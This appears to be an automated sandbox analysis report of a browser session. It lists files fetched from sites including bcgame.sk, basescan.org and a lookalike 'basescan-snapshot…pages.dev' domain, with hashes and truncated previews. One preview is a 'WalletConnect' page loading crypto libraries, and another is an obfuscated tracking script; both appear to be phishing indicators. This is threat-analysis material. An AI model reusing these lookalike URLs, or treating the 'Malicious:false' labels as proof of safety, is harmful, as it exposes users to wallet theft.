                                                                                                                                                                                                                                              SHA-512:ECCE14BFEECB4AD07CA630693013B6033B2919056B5E87197A2C885B30B46B15FCF8FF9111A1562EBCDD5B2DD6F6F58D2AA82680DEC684F147D01654DFE2EC0F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSClipboard={_baseConfig:{},pageCollection:$(),init:function(selector,config){this.collection=selector&&$(selector).length?$(selector):$();if(!$(selector).length)return;this.config=config&&$.isPlainObject(config)?$.extend({},this._baseConfig,config):this._baseConfig;this.config.itemSelector=selector;this.initClipboard();return this.pageCollection;},initClipboard:function(){var $self=this,collection=$self.pageCollection,shortcodeArr={};$('[data-content-target]').each(function(){var $this=$(this),contentTarget=$this.data('content-target');if($(contentTarget).is('input, textarea, select')){shortcodeArr[contentTarget]=$(contentTarget).val()}else{shortcodeArr[contentTarget]=$(contentTarget).html();}});this.collection.each(function(i,el){var windW=$(window).width(),$this=$(el),defaultText=$this.get(0).lastChild.nodeValue,classChangeTarget=$this.data('class-change-target'),defaultClass=$this.data('default-class'),title=$this.attr('title'),type=$t
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 104, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2463
                                                                                                                                                                                                                                              Entropy (8bit):7.715625471916005
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:Q+Zazwe1o9+DQqAR4yv6huudHDmmlU4Z5DmC2sqg80k0YKfVZKmpn7:razwe1o9IQqARxv4u8nlR562V+/K93
                                                                                                                                                                                                                                              MD5:BBA340BB9CFC0F70149BAEFE8E216E3B
                                                                                                                                                                                                                                              SHA1:B701A513E169A5CC06369F5E189E26A4047D9CF8
                                                                                                                                                                                                                                              SHA-256:78AD426FD43DB3CDADB3D7F564EC74CDD6F29A13CBC4B2F23B551A26BDD0DBF6
                                                                                                                                                                                                                                              SHA-512:554CA9D1D5751007BE5C0F3CC3DA07D7CC6E58C7EB7726E778EBE2A4C195D380FFE806E6386DE27FF1FF9CF2A43692137ACE1F77C472DF60BBE7A509F3B92A58
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.......h.......OB....sRGB.........gAMA......a.... PLTE......................................................................................................................................................................................................................................................................................`tRNS..@....`...!...p...P`.Ao.Q0..1.Aa..a....11q."Qp.......n.......p......_.O.... 0poP._.@0.. .W.6....IDATx..ww.6../..C.v....M...{ez.C.....-Z..q...+F.....F:...{qL;v..c.....m ..h...I.O.@.-.imI.....m.gM..M.O.[...%..z.%.NM.....C.2..b.P.<.kd........pIN.&|N...h...IY!.J...5i........$.......@...B$..\qZ.....?..r..................\.{@{....... .......C..*...Y.1..$.I.&...&.d.h/..F...~6....Y...!........R .FE.CN....j&.....|.*....~%..xh....D....X......r#..D.i.$@.".?....I..29..H..,..Y....../.(........b.h....u#..G....F...c.J{. .$.q..A..B.O6..g@6%..G5(.LE7l.....Z.@J96.Y.:...i.+...tHKo.Y.~.. R..C.4...r..I...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):75
                                                                                                                                                                                                                                              Entropy (8bit):4.70077390470751
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JS0FIDX/ILCzRIB2DJCXcfZF3vn:e/IO9IB2DJCWv
                                                                                                                                                                                                                                              MD5:B6B7E47B8857F386F30C7E7C8D4F5699
                                                                                                                                                                                                                                              SHA1:396D008A6423C0FB0558CEF753998234AB13835F
                                                                                                                                                                                                                                              SHA-256:2506A267D9C079C6ED69E13736EFED41FDB20438A8598C6D767C74DA0DE10261
                                                                                                                                                                                                                                              SHA-512:632BB1B9E2496467ED1821CC71D52846A5D6EFE56C7455A6D6FCBE0DABBFCB49E33D350C6CA7607B27E5D5F341E0EC92D60DE482772E81E724B87E2719D4E80A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/toast-unhandle-error-992739c6.js
                                                                                                                                                                                                                                              Preview:import{t as r}from"./manifest-51a3674f.js";const a=t=>r(t);export{a as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):17284
                                                                                                                                                                                                                                              Entropy (8bit):7.884080793829803
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:dYNg7/c3CsEW5n7BRsgqVG7PYMStHS4MU31xUd8l/:dYyYSsEW5nNRAQdw/lxUd89
                                                                                                                                                                                                                                              MD5:D353497E431563F766B003B66F5ACB04
                                                                                                                                                                                                                                              SHA1:3A79A216E79E3CF6506E42845C7BC509106FB154
                                                                                                                                                                                                                                              SHA-256:3A9D01BA88FA4094057E07CE1759DE59B72525E3B6281B26FB873C3B999C180C
                                                                                                                                                                                                                                              SHA-512:4121F841AA8F0E0BA82F71B27B2AF9D73FC99505260D64D1331910DC73EC341D4992F486766E88B628D6D34067E782C50D11715801276ABA27D8603B2E5A215F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/1b0425c6-d2cc-40af-8820-67eee4bc9b3b.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..6....(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3147), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3147
                                                                                                                                                                                                                                              Entropy (8bit):5.495344613604667
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Mj94lnDIs6TKni7ijLVl/1NuxEw1LtAygHzJ4dOxy7H:Q9KDIs6TfuLj3mHFICdOxyr
                                                                                                                                                                                                                                              MD5:A7FBCFC42CF35B703E57DC3D160EA747
                                                                                                                                                                                                                                              SHA1:F3C64769FC7E714E0B6AB5756BA5775BCD135933
                                                                                                                                                                                                                                              SHA-256:ECA000518F96FCA7E89744EF4F054080B65DF1C4C5A13CD4305F51266662996B
                                                                                                                                                                                                                                              SHA-512:BAF78E43943F54785D9E9F510E4F0071843B04F83870464C29F7B4F864FA118834DF869F12CD9D5888FB8C4BF3277DB7AD9187BC1CCC89C66409BAB962D579AC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://rtgio.co/assets/js/bcgame.js
                                                                                                                                                                                                                                              Preview:((()=>{'use strict';const O={'KxOXU':function(f,k){return f+k;},'YEcWz':function(f,k){return f*k;},'DGuOO':function(f,k){return f*k;},'FmwPg':function(f,k){return f*k;},'JuHQB':function(f,k){return f*k;},'SaLhe':function(f,k){return f+k;},'kBlVa':';\x20expires=','YHKzK':';\x20secure;\x20samesite=lax;\x20path=/;','gMaaf':function(f,k){return f+k;},'NiaNW':'v1.0.','hCYhG':function(f){return f();},'LqIEz':'rtgio_tid','jCOHO':'/pageview/bcgame.gif','wkxbP':'_pr','IACSR':'_pl','LKhJx':'_bl','bApJh':'1.0','JVfcr':'_sp','pCezK':'_cid','zSqtz':'_cd','hpAsR':'referrerPolicy','dhTsB':'strict-origin-when-cross-origin','cplFV':'async','EACxD':'src','zjiZx':function(f,k){return f>k;},'UMxTW':function(f,k){return f!==k;}};function W(){}W['prototype']['n']=function(f,k){const F=new Date();const Q=-0x1*0x385+0xfb*-0x23+0x13*0x211;F['setTime'](O['KxOXU'](F['getTime'](),O['YEcWz'](O['DGuOO'](O['FmwPg'](O['JuHQB'](Q,0xe59+-0x1dba+-0xe9*-0x11),-0x200e+-0x1*-0x1b95+-0x4b5*-0x1),-0x20*-0x10d+-0x105e+-0x1106
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):161578
                                                                                                                                                                                                                                              Entropy (8bit):7.997619296463544
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:3072:Wc4/dllI2j4FO9bnMctqV3Ij71yaLp2EP0hMYhiYC8GrJI5CM9oqkxEBORlKqWh:WcCPlIw4FOFMWzduhMY1C8Gu5CM9oqkY
                                                                                                                                                                                                                                              MD5:EE02C508B6631466A468B43F5C0E003E
                                                                                                                                                                                                                                              SHA1:AF9574DAE5C13493A02671405031B068481A7E7B
                                                                                                                                                                                                                                              SHA-256:A131813E117E93A985A3B2ACE96344F239821C88DA71E3FBABDDBA7FF09A1D58
                                                                                                                                                                                                                                              SHA-512:8C723BEE39B4B38B3EBB002335A01842BA5FE78CE507DF95C9342978053DC4CB635F9F145539F6DB8D1032A2307E692B9C19B535854A5E541348E331B5DBEDD3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/bingo-Cj_fMpbj.png
                                                                                                                                                                                                                                              Preview:RIFF"w..WEBPVP8L.w../?......m......H. .#.@.f.Kx..[...$.l...+P>..}.~....b.l8...V.6.w.m...[p}..l.-..j ...c...l..%O....4...u..5.......G.M..:&uL.BRG...I.L..&&]L..\.{BC@C@."!..{.peyQ.....\y....L.Z...T..&jb.x3..5V*s3nj.,..".).5..Xj.g'.2.+b.b.M...T.T..8.R.&..a._o,...mf....@.....kEk.hm1K0!.0;....`.B..a....3u..#.@...$.A....&"....Q&..L..(p.8.M..."..UQg...<n"ja0K.a.RK.....7l!.S..s..fT...x`c..../`).L^..G..H'.Z{c9.....R.........G..._c.[.)E.+9....f.&..\...7".VE'.tP..R6...jZ.:......>...E.9....n....>..a.M>...E..r.5.!......~P....kj........Q...}.....M..p..Ug.....6~.,n6O/..w..].....g..wY.....`?.x.y\.-p;....?2......E=y.e..O.O?..E...N......[s...F(.p....V.g...):.V.......P.$.m.I....:..5{.cDL..o.d.gSB.._....Q..'..C....8.eK....D0...c.k.k.....@.8..T....J..8..q.3z`.:W...=*I..7.D.f.....YM.q.K..k.E..`...I.q.....Z.D...$u.........#....D.'&..J.Z5o..r.......E.LU..V....U.q..w..v.<.B]|.J..Q..Z..E...xh[....&a..E....$..%... _......s?!Q..S.j.zA9*/.....n"I^..vn...B..V... J..xan.$$........_
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, Unicode text, UTF-8 text, with very long lines (9193)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9388
                                                                                                                                                                                                                                              Entropy (8bit):5.872612640764025
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:bbvRTDxLethW+4TdfcMvY5ksdYftVXuBfqiD2kwpwBq1BYumCbA:bbxD1ghV4Td5Q7SftVYHDmpcurA
                                                                                                                                                                                                                                              MD5:721E8F0F5AB1354241425B099CCF38E2
                                                                                                                                                                                                                                              SHA1:AA472EFC6AA880F11FF42F85891B9C3BC8301E48
                                                                                                                                                                                                                                              SHA-256:6F8F59E8A6D420DCCA0E631D03B837EC3086104A4EA247EF6E3038DA729E30DA
                                                                                                                                                                                                                                              SHA-512:DF88EA98B0572F9A37D24BDBC1CEA59C68AA73471061B36CB7E3F868CA03279A8A299B4902B29F2038E2961F770CC8299D11C5573E9D7B885B3215E858B7A8FC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{bh as t}from"./index-DD2Zk4iT.js";import{b as J}from"./_basePropertyOf-BhSQSS-6.js";function L(e,r,s){var u=-1,a=e.length;r<0&&(r=-r>a?0:a+r),s=s>a?a:s,s<0&&(s+=a),a=r>s?0:s-r>>>0,r>>>=0;for(var n=Array(a);++u<a;)n[u]=e[u+r];return n}function $(e,r,s){var u=e.length;return s=s===void 0?u:s,!r&&s>=u?e:L(e,r,s)}var V="\\ud800-\\udfff",T="\\u0300-\\u036f",Q="\\ufe20-\\ufe2f",H="\\u20d0-\\u20ff",K=T+Q+H,I="\\ufe0e\\ufe0f",N="\\u200d",P=RegExp("["+N+V+K+I+"]");function b(e){return P.test(e)}function W(e){return e.split("")}var A="\\ud800-\\udfff",X="\\u0300-\\u036f",Y="\\ufe20-\\ufe2f",F="\\u20d0-\\u20ff",q=X+Y+F,G="\\ufe0e\\ufe0f",_="["+A+"]",o="["+q+"]",i="\\ud83c[\\udffb-\\udfff]",ee="(?:"+o+"|"+i+")",v="[^"+A+"]",k="(?:\\ud83c[\\udde6-\\uddff]){2}",C="[\\ud800-\\udbff][\\udc00-\\udfff]",re="\\u200d",m=ee+"?",y="["+G+"]?",se="(?:"+re+"(?:"+[v,k,C].join("|")+")"+y+m+")*",ae=y+m+se,ue="(?:"+[v+o+"?",o,k,C,_].join("|")+")",ce=RegExp(i+"(?="+i+")|"+ue+ae,"g");function ne(e){return e.m
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, Unicode text, UTF-8 text, with very long lines (9193)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9388
                                                                                                                                                                                                                                              Entropy (8bit):5.872612640764025
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:bbvRTDxLethW+4TdfcMvY5ksdYftVXuBfqiD2kwpwBq1BYumCbA:bbxD1ghV4Td5Q7SftVYHDmpcurA
                                                                                                                                                                                                                                              MD5:721E8F0F5AB1354241425B099CCF38E2
                                                                                                                                                                                                                                              SHA1:AA472EFC6AA880F11FF42F85891B9C3BC8301E48
                                                                                                                                                                                                                                              SHA-256:6F8F59E8A6D420DCCA0E631D03B837EC3086104A4EA247EF6E3038DA729E30DA
                                                                                                                                                                                                                                              SHA-512:DF88EA98B0572F9A37D24BDBC1CEA59C68AA73471061B36CB7E3F868CA03279A8A299B4902B29F2038E2961F770CC8299D11C5573E9D7B885B3215E858B7A8FC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/index-DH9MDtxd.js
                                                                                                                                                                                                                                              Preview:import{bh as t}from"./index-DD2Zk4iT.js";import{b as J}from"./_basePropertyOf-BhSQSS-6.js";function L(e,r,s){var u=-1,a=e.length;r<0&&(r=-r>a?0:a+r),s=s>a?a:s,s<0&&(s+=a),a=r>s?0:s-r>>>0,r>>>=0;for(var n=Array(a);++u<a;)n[u]=e[u+r];return n}function $(e,r,s){var u=e.length;return s=s===void 0?u:s,!r&&s>=u?e:L(e,r,s)}var V="\\ud800-\\udfff",T="\\u0300-\\u036f",Q="\\ufe20-\\ufe2f",H="\\u20d0-\\u20ff",K=T+Q+H,I="\\ufe0e\\ufe0f",N="\\u200d",P=RegExp("["+N+V+K+I+"]");function b(e){return P.test(e)}function W(e){return e.split("")}var A="\\ud800-\\udfff",X="\\u0300-\\u036f",Y="\\ufe20-\\ufe2f",F="\\u20d0-\\u20ff",q=X+Y+F,G="\\ufe0e\\ufe0f",_="["+A+"]",o="["+q+"]",i="\\ud83c[\\udffb-\\udfff]",ee="(?:"+o+"|"+i+")",v="[^"+A+"]",k="(?:\\ud83c[\\udde6-\\uddff]){2}",C="[\\ud800-\\udbff][\\udc00-\\udfff]",re="\\u200d",m=ee+"?",y="["+G+"]?",se="(?:"+re+"(?:"+[v,k,C].join("|")+")"+y+m+")*",ae=y+m+se,ue="(?:"+[v+o+"?",o,k,C,_].join("|")+")",ce=RegExp(i+"(?="+i+")|"+ue+ae,"g");function ne(e){return e.m
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):6968
                                                                                                                                                                                                                                              Entropy (8bit):7.966676796248433
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:69fTCSkJ/XjEGSJE1SCGeXxB5JvAox6/n:skTEGgE8CLv6/n
                                                                                                                                                                                                                                              MD5:105893E97479C8E7365D7DFFD518BF20
                                                                                                                                                                                                                                              SHA1:F86FCB9FFBDEBC414E00456EB525B840FD7CC350
                                                                                                                                                                                                                                              SHA-256:5FE2930079E6BF6046AB9D80765A9F6856454121D2D4879271A390F6ECB87092
                                                                                                                                                                                                                                              SHA-512:00A76174743B7C4DE627AC33C7C3F31E04348A72B4B50AF36D185329410EC92C6487E9D5AC2C3A4F0218BD41E4700CEB6CBE6C2C8E7B7CBF3BF84766F27BF58C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............X......sRGB.........IDATx..=..Q....`!..ja./.+....g...JA.m.9'...JZ+K.B.....D;mlDmV...g.FV..%.`'Q.M.'.........'.@&8.!...kH:.h..IT*...#...%....L.V.u.$. ......o...k.......*...=p..8.i.Y;@R..Z..J.....n.TNR.........k..3I...Y...%=..K.N..a.X3...g.'D..... ..7.A.O....{......;'2..Q....3;.V{.#..=...G.w.d.wI.G..<~.wd.,..4o}.C...E.O.A..2A6.(8.C.]no..#.(....#2BV......\_(w.w......h\d...ep...v....A......,.)...t.l..3.<J.bu..*[d...3..m......U7E;.....&.....f.....+.E.."8v8........1..:.....o.#...aQ..t...R..(.*IR...B....:...!Y=.%..:.n....]p.xj....n......;t..9...$N....&.D...<....l.lwXu...g.............C....~(..Z-.......o.............?.).F.u.%.cV.1.......E...`.........gfb.....Te..../..OS.4......31*jpFLfrO7.k.V4.FQT..(>@..!(>PQ.F..F.....9....._w.O.U.B.g.s.^...V..T....{..^...@.M.d9.e..7....W(..N.3....>.MF4...s.p...q&...|.L@K..E.qM..a^4..{.N.3...{2.H.*...,.N.....-w.p..$...4F.n...f,*...b.1..uaI...g.snJ....zYB...........d8.....j.........m.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2695), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2698
                                                                                                                                                                                                                                              Entropy (8bit):5.0507172699911225
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:fi9CsEVX8aCKqgg0nRzRDbRMvKdL4RKmZ4iKH48okeyjaIKpKYQ/NVcCR2yPMMem:fuEVs9d0J0SKZw6nQ/NhlC2z
                                                                                                                                                                                                                                              MD5:5176DF6710066D6822C149F95F63021C
                                                                                                                                                                                                                                              SHA1:DB3EB5737D139186C4D2EF628D5AE10F85A1E35F
                                                                                                                                                                                                                                              SHA-256:894423602BA42B70434310C9904884BF03058FE7A00AC0C125FA4776D6F611D4
                                                                                                                                                                                                                                              SHA-512:09447C99F1D51AF70BD51579EFD7287A707D740FEB5BFA4B289878BB1FF170CB776B5A5B0FD8FBF34C33F4919903E43D37F6A345846BFD0B884623DB4FD7AB7A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/css/custom.css?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:..wrapper{height:auto!important;height:100%;margin:0 auto -99px;min-height:100%;background-color:#f8f9fa!important}#push{height:99px}body.dark-mode .wrapper{background-color:#132a47!important}.ui-autocomplete{max-height:300px;overflow-y:auto;overflow-x:hidden;padding-bottom:1px;z-index:91199}body.dark-mode .ui-autocomplete{background-color:#01263f!important;border-color:#013558}.ui-autocomplete .left{float:left}.ui-autocomplete .right{float:right}.ui-autocomplete-category{padding:5px 15px;margin:0;font-weight:700}.jvectormap-container{width:100%;height:100%}.hd-doc-search__category{display:block;color:#377dff}.ui-autocomplete-input.form-control:not(:last-child){border-top-right-radius:.125rem;border-bottom-right-radius:.125rem}.anomaly{background:#f9f9f9!important}body.dark-mode .anomaly{background:#012c49!important}tspan{text-decoration:none;text-shadow:none!important}body.dark-mode .highcharts-data-labels text{color:#a2b9c8!important;fill:#a2b9c8!important}body.dark-mode .u-ver-div
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):567
                                                                                                                                                                                                                                              Entropy (8bit):7.088548650367209
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:6v/7MR8IlgQ9oB9H4f8yE4Koc6IOOBqR30ipvT2t1:z8IL9o4fvE41EOOsJRKL
                                                                                                                                                                                                                                              MD5:16332B8DDAAFB0C692B54118B9EC0E71
                                                                                                                                                                                                                                              SHA1:B5418A315706145D40E76E22CDA8D076EB0329C0
                                                                                                                                                                                                                                              SHA-256:1DF3270A422760D53FE58F7ADA84BC2D0F72B0310DA5D17AF2AB56C8089133F9
                                                                                                                                                                                                                                              SHA-512:A40625BD735EF1ECC2B7D358AACB4595819479F0BED9EB5ABA924A4DD6FBC9DAA32078C86CB210E75FE0FE0B8F62B9D8A87D80B64F2C0D1CC1E9C20349D9F35B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/gen/metawin_20.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............W.?....PLTE.........................................................---...CBD<;<!!!......```\\\KKK...........iijSSS%%&................................mmnfff]]]))).........................................~~.yyy[[[555545....'.#....tRNS.......[R.S\.......IDAT..m..n.0..P..N....3{'.{..'..]..r..D."...K"..4R.oTM..C..:..i`Y....@p.C...:yhm.o....j.C.......Y......(b8..............K6...DO-.DD.I..i....."..?`.^O.JD:`.~....[4...6.gw.^.X.72}xs..Ee..6.#......qVd..#u..{...w...F........6V.;.M...M...8.!._].?K............a......IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):13171
                                                                                                                                                                                                                                              Entropy (8bit):4.79061419199999
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:B5GrNLI3I73KJqXxN4S0pUb6spDs+ggildlePt3tQPd05:acRje
                                                                                                                                                                                                                                              MD5:0048386984378B05E34E4519C6273816
                                                                                                                                                                                                                                              SHA1:05158D5923C324EDDF3614AC8C02001AC1451C02
                                                                                                                                                                                                                                              SHA-256:8683909324FD4F7C10B0CFBF3DC185D5EBEC4E4F079A85B2C34087C1C522A963
                                                                                                                                                                                                                                              SHA-512:35F156A7DB8B62828BD61FDDC8FACDE3228D9C5611F414666F45C5A914246903075D1FA496A7516D74393332BC1A268D0743CBDA9B250B6319C95A3E0019E58C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/style.css
